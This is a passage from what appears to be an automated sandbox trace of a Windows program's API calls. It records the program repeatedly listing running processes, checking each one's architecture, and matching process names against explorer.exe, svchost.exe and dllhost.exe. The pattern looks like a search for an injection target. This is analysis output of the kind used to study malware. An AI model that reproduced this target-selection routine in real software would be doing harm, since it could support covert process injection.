(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0210.273] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.274] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.274] CloseHandle (hObject=0xec) returned 1 [0210.274] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0210.274] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0210.274] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0210.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0210.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0210.274] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.274] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.274] CloseHandle (hObject=0xec) returned 1 [0210.274] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0210.274] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0210.274] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0210.274] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0210.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0210.275] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.275] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.275] CloseHandle (hObject=0xec) returned 1 [0210.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0210.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0210.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0210.275] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0210.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0210.276] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.276] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.276] CloseHandle (hObject=0xec) returned 1 [0210.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0210.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0210.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0210.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0210.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0210.276] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.276] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.276] CloseHandle (hObject=0xec) returned 1 [0210.276] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0210.276] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0210.276] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0210.276] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0210.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0210.277] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.277] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.277] CloseHandle (hObject=0xec) returned 1 [0210.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0210.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0210.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0210.277] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0210.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0210.278] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.278] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.278] CloseHandle (hObject=0xec) returned 1 [0210.278] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0210.278] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0210.278] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0210.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0210.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0210.278] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.278] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.278] CloseHandle (hObject=0xec) returned 1 [0210.278] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0210.278] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0210.278] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0210.278] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0210.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0210.279] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.279] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.279] CloseHandle (hObject=0xec) returned 1 [0210.279] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0210.279] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0210.279] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0210.279] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0210.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0210.280] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.280] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.280] CloseHandle (hObject=0xec) returned 1 [0210.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0210.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0210.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0210.280] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0210.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0210.280] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.280] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.280] CloseHandle (hObject=0xec) returned 1 [0210.280] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0210.280] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0210.280] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0210.281] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0210.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0210.292] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.292] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.292] CloseHandle (hObject=0xec) returned 1 [0210.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0210.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0210.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0210.292] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0210.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0210.293] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.293] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.293] CloseHandle (hObject=0xec) returned 1 [0210.293] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0210.293] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0210.293] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0210.293] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0210.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0210.293] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.293] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.294] CloseHandle (hObject=0xec) returned 1 [0210.294] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0210.294] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0210.294] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0210.294] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0210.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0210.294] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.294] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.294] CloseHandle (hObject=0xec) returned 1 [0210.294] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0210.294] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0210.294] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0210.294] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0210.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0210.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0210.296] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0210.296] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0210.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0210.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0210.436] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.436] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.436] CloseHandle (hObject=0xec) returned 1 [0210.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0210.437] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.437] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.437] CloseHandle (hObject=0xec) returned 1 [0210.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0210.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0210.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.438] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.438] CloseHandle (hObject=0xec) returned 1 [0210.438] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0210.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0210.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.439] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.439] CloseHandle (hObject=0xec) returned 1 [0210.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0210.440] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.440] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.440] CloseHandle (hObject=0xec) returned 1 [0210.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0210.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0210.440] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.441] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0210.441] CloseHandle (hObject=0xec) returned 1 [0210.441] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0210.441] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0210.441] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0210.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0210.441] CloseHandle (hObject=0xe8) returned 1 [0210.441] Sleep (dwMilliseconds=0x3e8) [0211.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0211.469] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0211.469] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0211.470] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0211.470] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0211.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0211.471] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0211.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0211.472] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0211.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0211.473] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0211.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0211.474] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 